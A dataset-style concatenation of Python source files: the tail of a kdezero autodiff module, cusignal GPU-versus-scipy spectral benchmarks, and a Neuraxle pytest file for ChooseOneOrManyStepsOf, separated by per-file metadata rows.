    xp = kdezero.cuda.get_array_module(x0.data)
    return Sub()(x0, as_array(x1, xp))
def rsub(x0, x1):
    """Reflected subtraction: return x1 - x0, coercing x1 onto x0's device."""
    xp = kdezero.cuda.get_array_module(x0.data)
    return Sub()(as_array(x1, xp), x0)
class Div(Function):
    """Element-wise division with broadcasting-aware backward."""

    def forward(self, x0, x1):
        return x0 / x1

    def backward(self, gy):
        num, den = self.inputs
        grad_num = gy / den
        # d(num/den)/d(den) = -num / den**2
        grad_den = gy * (-num / den ** 2)
        if num.shape != den.shape:
            grad_num = kdezero.functions.sum_to(grad_num, num.shape)
            grad_den = kdezero.functions.sum_to(grad_den, den.shape)
        return grad_num, grad_den
def div(x0, x1):
    """Divide x0 by x1, coercing x1 onto x0's device."""
    xp = kdezero.cuda.get_array_module(x0.data)
    return Div()(x0, as_array(x1, xp))
def rdiv(x0, x1):
    """Reflected division: return x1 / x0, coercing x1 onto x0's device."""
    xp = kdezero.cuda.get_array_module(x0.data)
    return Div()(as_array(x1, xp), x0)
class Pow(Function):
    """Raise the input to a fixed scalar power ``c``."""

    def __init__(self, c):
        # The exponent is a plain constant; no gradient flows through it.
        self.c = c

    def forward(self, x):
        return x ** self.c

    def backward(self, gy):
        base = self.inputs[0]
        exponent = self.c
        # d/dx x**c = c * x**(c - 1)
        return exponent * base ** (exponent - 1) * gy
def pow(x, c):
    """Return x raised to the constant power c."""
    return Pow(c)(x)
| 22.125
| 62
| 0.572881
| 407
| 2,655
| 3.63145
| 0.105651
| 0.056834
| 0.102842
| 0.113667
| 0.768606
| 0.753045
| 0.723275
| 0.705007
| 0.705007
| 0.705007
| 0
| 0.067597
| 0.297928
| 2,655
| 119
| 63
| 22.310924
| 0.725322
| 0
| 0
| 0.452381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.035714
| 0.083333
| 0.595238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
39148d52ba2982161a8a733d3c5526b1346d4f9d
| 14,609
|
py
|
Python
|
python/cusignal/benchmark/bench_spectral.py
|
efajardo-nv/cusignal
|
9949e1d3f0964ec06c376600eb4335a0980c1bb8
|
[
"Apache-2.0"
] | null | null | null |
python/cusignal/benchmark/bench_spectral.py
|
efajardo-nv/cusignal
|
9949e1d3f0964ec06c376600eb4335a0980c1bb8
|
[
"Apache-2.0"
] | null | null | null |
python/cusignal/benchmark/bench_spectral.py
|
efajardo-nv/cusignal
|
9949e1d3f0964ec06c376600eb4335a0980c1bb8
|
[
"Apache-2.0"
] | 3
|
2020-08-06T12:31:46.000Z
|
2022-02-24T22:30:45.000Z
|
# Copyright (c) 2019-2020, NVIDIA CORPORATION.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import cupy as cp
import numpy as np
from cusignal.test.utils import array_equal
import cusignal
from scipy import signal
@pytest.mark.benchmark(group="CSD")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
# Bench is required in class name for the test to be active
class BenchCSD:
    """Benchmark cross spectral density: scipy (CPU) vs cusignal (GPU)."""
    # This function will ensure the GPU version is getting the correct answer
    def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
        return signal.csd(cpu_x, cpu_y, fs, nperseg=nperseg)
    # bench_ is required in function name to be searchable with -k parameter
    def bench_csd_cpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
        cpu_x, _ = rand_data_gen(num_samps)
        cpu_y, _ = rand_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
    def bench_csd_gpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
        cpu_x, gpu_x = rand_data_gen(num_samps)
        cpu_y, gpu_y = rand_data_gen(num_samps)
        # Variable output holds the result from cusignal.csd.
        # It is not copied back until the assert, so timing is not impacted.
        _, output = benchmark(cusignal.csd, gpu_x, gpu_y, fs, nperseg=nperseg)
        _, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
        # Verify the GPU result against the scipy reference.
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="CSDComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchCSDComplex:
    """Benchmark CSD on complex-valued input: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
        # scipy reference implementation used as ground truth.
        return signal.csd(cpu_x, cpu_y, fs, nperseg=nperseg)
    def bench_csd_complex_cpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_x, _ = rand_complex_data_gen(num_samps)
        cpu_y, _ = rand_complex_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
    def bench_csd_complex_gpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_x, gpu_x = rand_complex_data_gen(num_samps)
        cpu_y, gpu_y = rand_complex_data_gen(num_samps)
        _, output = benchmark(cusignal.csd, gpu_x, gpu_y, fs, nperseg=nperseg)
        _, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Periodogram")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("window", ["flattop", "nuttall"])
@pytest.mark.parametrize("scaling", ["spectrum", "density"])
class BenchPeriodogram:
    """Benchmark periodogram PSD estimate: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, window, scaling):
        # scipy reference implementation used as ground truth.
        return signal.periodogram(cpu_sig, fs, window=window, scaling=scaling)
    def bench_periodogram_cpu(
        self, rand_data_gen, benchmark, num_samps, fs, window, scaling
    ):
        cpu_sig, _ = rand_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, window, scaling)
    def bench_periodogram_gpu(
        self, rand_data_gen, benchmark, num_samps, fs, window, scaling
    ):
        cpu_sig, gpu_sig = rand_data_gen(num_samps)
        _, output = benchmark(
            cusignal.periodogram, gpu_sig, fs, window=window, scaling=scaling
        )
        _, key = self.cpu_version(cpu_sig, fs, window, scaling)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="PeriodogramComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("window", ["flattop", "nuttall"])
@pytest.mark.parametrize("scaling", ["spectrum", "density"])
class BenchPeriodogramComplex:
    """Benchmark periodogram on complex input: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, window, scaling):
        return signal.periodogram(cpu_sig, fs, window=window, scaling=scaling)
    def bench_periodogram_complex_cpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, window, scaling
    ):
        cpu_sig, _ = rand_complex_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, window, scaling)
    def bench_periodogram_complex_gpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, window, scaling
    ):
        cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
        _, output = benchmark(
            cusignal.periodogram, gpu_sig, fs, window=window, scaling=scaling
        )
        _, key = self.cpu_version(cpu_sig, fs, window, scaling)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Welch")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchWelch:
    """Benchmark Welch PSD estimate: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, nperseg):
        # scipy reference implementation used as ground truth.
        return signal.welch(cpu_sig, fs, nperseg=nperseg)
    def bench_welch_cpu(
        self, rand_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, _ = rand_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, nperseg)
    def bench_welch_gpu(
        self, rand_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, gpu_sig = rand_data_gen(num_samps)
        _, output = benchmark(cusignal.welch, gpu_sig, fs, nperseg=nperseg)
        _, key = self.cpu_version(cpu_sig, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="WelchComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchWelchComplex:
    """Benchmark Welch PSD on complex input: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, nperseg):
        return signal.welch(cpu_sig, fs, nperseg=nperseg)
    def bench_welch_complex_cpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, _ = rand_complex_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, nperseg)
    def bench_welch_complex_gpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
        _, output = benchmark(cusignal.welch, gpu_sig, fs, nperseg=nperseg)
        _, key = self.cpu_version(cpu_sig, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Spectrogram")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSpectrogram:
    """Benchmark spectrogram computation: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, nperseg):
        # Returns (f, t, Sxx); only the third element is compared.
        return signal.spectrogram(cpu_sig, fs, nperseg=nperseg)
    def bench_spectrogram_cpu(
        self, rand_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, _ = rand_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, nperseg)
    def bench_spectrogram_gpu(
        self, rand_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, gpu_sig = rand_data_gen(num_samps)
        _, _, output = benchmark(
            cusignal.spectrogram, gpu_sig, fs, nperseg=nperseg
        )
        _, _, key = self.cpu_version(cpu_sig, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="SpectrogramComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSpectrogramComplex:
    """Benchmark spectrogram on complex input: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, nperseg):
        return signal.spectrogram(cpu_sig, fs, nperseg=nperseg)
    def bench_spectrogram_complex_cpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, _ = rand_complex_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, nperseg)
    def bench_spectrogram_complex_gpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
        _, _, output = benchmark(
            cusignal.spectrogram, gpu_sig, fs, nperseg=nperseg
        )
        _, _, key = self.cpu_version(cpu_sig, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Coherence")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchCoherence:
    """Benchmark magnitude-squared coherence: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
        # scipy reference implementation used as ground truth.
        return signal.coherence(cpu_x, cpu_y, fs, nperseg=nperseg)
    def bench_coherence_cpu(
        self, rand_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_x, _ = rand_data_gen(num_samps)
        cpu_y, _ = rand_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
    def bench_coherence_gpu(
        self, rand_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_x, gpu_x = rand_data_gen(num_samps)
        cpu_y, gpu_y = rand_data_gen(num_samps)
        _, output = benchmark(
            cusignal.coherence, gpu_x, gpu_y, fs, nperseg=nperseg
        )
        _, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="CoherenceComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchCoherenceComplex:
    """Benchmark coherence on complex input: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
        return signal.coherence(cpu_x, cpu_y, fs, nperseg=nperseg)
    def bench_coherence_complex_cpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_x, _ = rand_complex_data_gen(num_samps)
        cpu_y, _ = rand_complex_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
    def bench_coherence_complex_gpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_x, gpu_x = rand_complex_data_gen(num_samps)
        cpu_y, gpu_y = rand_complex_data_gen(num_samps)
        _, output = benchmark(
            cusignal.coherence, gpu_x, gpu_y, fs, nperseg=nperseg
        )
        _, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="STFT")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSTFT:
    """Benchmark short-time Fourier transform: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, nperseg):
        # Returns (f, t, Zxx); only the third element is compared.
        return signal.stft(cpu_sig, fs, nperseg=nperseg)
    def bench_stft_cpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
        cpu_sig, _ = rand_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, nperseg)
    def bench_stft_gpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
        cpu_sig, gpu_sig = rand_data_gen(num_samps)
        _, _, output = benchmark(cusignal.stft, gpu_sig, fs, nperseg=nperseg)
        _, _, key = self.cpu_version(cpu_sig, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="STFTComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSTFTComplex:
    """Benchmark STFT on complex input: scipy (CPU) vs cusignal (GPU)."""
    def cpu_version(self, cpu_sig, fs, nperseg):
        return signal.stft(cpu_sig, fs, nperseg=nperseg)
    def bench_stft_complex_cpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, _ = rand_complex_data_gen(num_samps)
        benchmark(self.cpu_version, cpu_sig, fs, nperseg)
    def bench_stft_complex_gpu(
        self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
    ):
        cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
        _, _, output = benchmark(cusignal.stft, gpu_sig, fs, nperseg=nperseg)
        _, _, key = self.cpu_version(cpu_sig, fs, nperseg)
        assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="LombScargle")
@pytest.mark.parametrize("num_in_samps", [2 ** 10])
@pytest.mark.parametrize("num_out_samps", [2 ** 16, 2 ** 18])
@pytest.mark.parametrize("precenter", [True, False])
@pytest.mark.parametrize("normalize", [True, False])
class BenchLombScargle:
    """Benchmark Lomb-Scargle periodogram on an unevenly sampled sine wave."""
    def cpu_version(self, x, y, f, precenter, normalize):
        # scipy reference implementation used as ground truth.
        return signal.lombscargle(x, y, f, precenter, normalize)
    def bench_lombscargle_cpu(
        self,
        linspace_data_gen,
        rand_data_gen,
        benchmark,
        num_in_samps,
        num_out_samps,
        precenter,
        normalize,
    ):
        # Build a sine wave sampled at irregular times (subset of a linspace).
        A = 2.0
        w = 1.0
        phi = 0.5 * np.pi
        frac_points = 0.9  # Fraction of points to select
        r, _ = rand_data_gen(num_in_samps)
        x, _ = linspace_data_gen(0.01, 10 * np.pi, num_in_samps)
        x = x[r >= frac_points]
        y = A * np.sin(w * x + phi)
        f, _ = linspace_data_gen(0.01, 10, num_out_samps)
        benchmark(self.cpu_version, x, y, f, precenter, normalize)
    @pytest.mark.parametrize("use_numba", [True, False])
    def bench_lombscargle_gpu(
        self,
        linspace_data_gen,
        rand_data_gen,
        benchmark,
        num_in_samps,
        num_out_samps,
        precenter,
        normalize,
        use_numba,
    ):
        # Same signal construction as the CPU benchmark above.
        A = 2.0
        w = 1.0
        phi = 0.5 * np.pi
        frac_points = 0.9  # Fraction of points to select
        r, _ = rand_data_gen(num_in_samps)
        x, _ = linspace_data_gen(0.01, 10 * np.pi, num_in_samps)
        x = x[r >= frac_points]
        y = A * np.sin(w * x + phi)
        f, d_f = linspace_data_gen(0.01, 10, num_out_samps)
        # Copy host arrays to the device outside the timed region.
        d_x = cp.asarray(x)
        d_y = cp.asarray(y)
        output = benchmark(
            cusignal.lombscargle,
            d_x,
            d_y,
            d_f,
            precenter,
            normalize,
            use_numba=use_numba,
        )
        key = self.cpu_version(x, y, f, precenter, normalize)
        assert array_equal(cp.asnumpy(output), key)
| 35.372881
| 79
| 0.673078
| 2,028
| 14,609
| 4.57002
| 0.094181
| 0.067976
| 0.097432
| 0.051791
| 0.827579
| 0.821752
| 0.821752
| 0.818084
| 0.810531
| 0.80902
| 0
| 0.019167
| 0.21076
| 14,609
| 412
| 80
| 35.458738
| 0.784649
| 0.064823
| 0
| 0.725806
| 0
| 0
| 0.034966
| 0
| 0
| 0
| 0
| 0
| 0.041935
| 1
| 0.125806
| false
| 0
| 0.019355
| 0.041935
| 0.229032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
200a18d773d50199c7e74c241f4f612aa4cb4084
| 17,967
|
py
|
Python
|
testing/steps/test_choose_one_or_many_steps_of.py
|
Neuraxio/Neuraxle
|
0615701b781c948e4ec38fa61c6b3a5d8d72c147
|
[
"Apache-2.0"
] | 519
|
2019-03-29T19:17:41.000Z
|
2022-03-31T12:45:42.000Z
|
testing/steps/test_choose_one_or_many_steps_of.py
|
Neuraxio/Neuraxle
|
0615701b781c948e4ec38fa61c6b3a5d8d72c147
|
[
"Apache-2.0"
] | 401
|
2019-06-09T19:06:47.000Z
|
2022-03-31T14:00:12.000Z
|
testing/steps/test_choose_one_or_many_steps_of.py
|
Neuraxio/Neuraxle
|
0615701b781c948e4ec38fa61c6b3a5d8d72c147
|
[
"Apache-2.0"
] | 55
|
2019-06-09T19:24:31.000Z
|
2022-01-22T00:17:42.000Z
|
import numpy as np
import pytest
from neuraxle.base import Identity
from neuraxle.hyperparams.distributions import Boolean
from neuraxle.hyperparams.space import HyperparameterSpace
from neuraxle.pipeline import Pipeline
from neuraxle.steps.flow import ChooseOneOrManyStepsOf, ChooseOneStepOf
from neuraxle.steps.misc import TransformCallbackStep, TapeCallbackFunction, FitTransformCallbackStep
from testing.steps.neuraxle_test_case import NeuraxleTestCase
# Shared fixture data for every test case below: the integers 0..9.
# Expected outputs mirror the inputs (callbacks double them at transform time).
DATA_INPUTS = np.array(range(10))
EXPECTED_OUTPUTS = np.array(range(10))
def create_test_case_single_step_choosen():
    """Test case: only step 'a' enabled, so only a_callback receives data."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
                ('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, b_callback],
        expected_callbacks_data=[
            DATA_INPUTS,
            []
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__a__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': False
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def create_test_case_multiple_steps_choosen():
    """Test case: both steps enabled; outputs are the doubled inputs twice."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
                ('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, b_callback],
        expected_callbacks_data=[DATA_INPUTS, DATA_INPUTS],
        hyperparams={
            'ChooseOneOrManyStepsOf__a__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': True
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def create_test_case_invalid_step_choosen():
    """Test case enabling a step name ('c') that does not exist in the list.

    NOTE(review): not referenced by any parametrize in this chunk — verify it
    is used (or intended to be used) elsewhere.
    """
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
                ('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, b_callback],
        expected_callbacks_data=[DATA_INPUTS, DATA_INPUTS],
        hyperparams={
            # 'c' is not one of the declared steps ('a', 'b').
            'ChooseOneOrManyStepsOf__c__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': False
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def create_test_case_invalid_step_not_choosen():
    """Test case with an unknown step name ('c') disabled; nothing should run.

    NOTE(review): not referenced by any parametrize in this chunk — verify it
    is used (or intended to be used) elsewhere.
    """
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
                ('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, b_callback],
        expected_callbacks_data=[DATA_INPUTS, DATA_INPUTS],
        hyperparams={
            'ChooseOneOrManyStepsOf__c__enabled': False,
            'ChooseOneOrManyStepsOf__b__enabled': False
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array(range(10))
    )
@pytest.mark.parametrize('test_case', [
    create_test_case_single_step_choosen(),
    create_test_case_multiple_steps_choosen()
])
def test_choose_one_or_many_step_of_transform_should_choose_step(
        test_case: NeuraxleTestCase):
    """transform() must execute only the steps enabled via hyperparams."""
    p = test_case.pipeline
    # Fix: the original bound this to a confusingly named `test` variable with
    # broken spacing (`test =HyperparameterSpace(...)`); the explicit wrap is
    # kept because this test exercised it, just without the useless temp.
    p.set_hyperparams_space(HyperparameterSpace(test_case.hyperparams_space))
    p.set_hyperparams(test_case.hyperparams)
    outputs = p.transform(DATA_INPUTS)
    assert np.array_equal(outputs, test_case.expected_processed_outputs)
    assert_callback_data_is_as_expected(test_case)
def assert_callback_data_is_as_expected(test_case):
    """Assert each callback recorded exactly its expected data (or nothing)."""
    pairs = zip(test_case.callbacks, test_case.expected_callbacks_data)
    for callback, expected in pairs:
        if callback.data:
            # The callback fired: its first recorded payload must match.
            assert np.array_equal(np.array(callback.data[0]), expected)
        else:
            # The callback never fired: the expectation must be empty too.
            assert np.array_equal(np.array([]), np.array(expected))
def create_test_case_fit_transform_single_step_choosen():
    """fit_transform test case: only 'a' enabled; its transform and fit
    callbacks fire, while 'b''s stay empty."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            DATA_INPUTS,
            (DATA_INPUTS, EXPECTED_OUTPUTS),
            [],
            []
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__a__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': False
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def create_test_case_fit_transform_multiple_steps_choosen():
    """fit_transform test case: both steps enabled; all four callbacks fire
    and the output is the doubled inputs twice."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            DATA_INPUTS,
            (DATA_INPUTS, EXPECTED_OUTPUTS),
            DATA_INPUTS,
            (DATA_INPUTS, EXPECTED_OUTPUTS)
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__a__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': True
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def create_test_case_fit_single_step_choosen():
    """fit-only test case: only 'a' enabled; only its fit callback fires
    (transform callbacks stay empty because fit does not transform)."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            [],
            (DATA_INPUTS, EXPECTED_OUTPUTS),
            [],
            []
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__a__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': False
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def create_test_case_fit_multiple_steps_choosen():
    """fit-only test case: both steps enabled; both fit callbacks fire."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneOrManyStepsOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            [],
            (DATA_INPUTS, EXPECTED_OUTPUTS),
            [],
